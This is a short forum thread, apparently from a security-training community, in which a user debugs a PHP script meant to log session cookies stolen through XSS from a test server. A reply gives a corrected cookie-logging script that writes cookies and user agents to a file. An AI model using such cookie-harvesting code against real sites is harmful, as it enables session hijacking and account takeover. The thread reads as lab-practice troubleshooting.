php script is not getting session cookie…

Viewing 3 reply threads
  • Author
    Posts
    • #7514
      wlandymore
      Participant

      Hey, I’ve been working on this for a bit and I have a php file that I’m trying to redirect to a test server and then get the cookie with XSS basically.

      My php file has:
      header(‘Location: http://vulnerableserver.com/index.php?user1’);
      $cookie = INI_Get(‘session.cookie_httponly’);
      $date = date (“l ds of F Y h:i:s A”);
      $user_agent = $_SERVER;
      $file = fopen(‘log.txt’, ‘a’);
      fwrite($file, “DATE : $date || USER AGENT : $user_agent || COOKIE : $cookie n”);
      fclose($file);
      ?>

      So it’s writing everything else to the file but the cookie part just shows:
      COOKIE:
      and there is no sessionId, etc.

      I tried using other things like “session_Get_Cookie_Params()” but that just gave me: COOKIE: array

      If I go to the website and make a post that has a link for “alert(‘document.cookie’)” then it spits the session ID out right away. How can I basically do the same thing only write it to the file?

    • #46894
      BillV
      Participant

      Well, for one, you likely need ‘session_start();’ at the top of your script to even have a PHP session.

      Second, use the $_COOKIE variable to grab the session identifier if that’s what you’re after.

      I commented out your header redirect and cookie portions, rewrote with the above and echoed the session id (and your log.txt still works and writes the session ID in there).


      <?php
      session_start();
      //header('Location: http://vulnerableserver.com/index.php?user1');
      //$cookie = INI_Get('session.cookie_httponly');
      $cookie = $_COOKIE;
      $date = date ("l ds of F Y h:i:s A");
      $user_agent = $_SERVER;
      $file = fopen('log.txt', 'a');
      fwrite($file, "DATE : $date || USER AGENT : $user_agent || COOKIE : $cookie n");
      fclose($file);
      echo $cookie;
      ?>
    • #46895
      Gromic
      Participant

      Hi wlandymore,

      ok this might sound odd – and it’s just a thought …so don’t get me wrong, but do you start your html file in a “server-context” meaning is it in your htdocs or do you just open it on your harddrive?

      Since if you do the second it won’t work or at least you cannot read the cookies from localhost …(Happend to me too…an alertbox on the page worked however php script could’t read cookies…).

      For “debuggin” try to throw both scripts in your htdocs … and look if the php script gets the cookies…

      Don’t know if this helps, was just a thought….

      Cheers,
      -gromic

    • #46896
      wlandymore
      Participant

      Thanks. It was already in the htdocs and I also tried another hosted webserver but it wasn’t working. Not sure what the issue is there but it just won’t get the cookie.  :'(

Viewing 3 reply threads
  • You must be logged in to reply to this topic.

Copyright ©2020 Caendra, Inc.

Contact Us

Thoughts, suggestions, issues? Send us an email, and we'll get back to you.

Sending

Sign in with Caendra

Forgot password?Sign up

Forgot your details?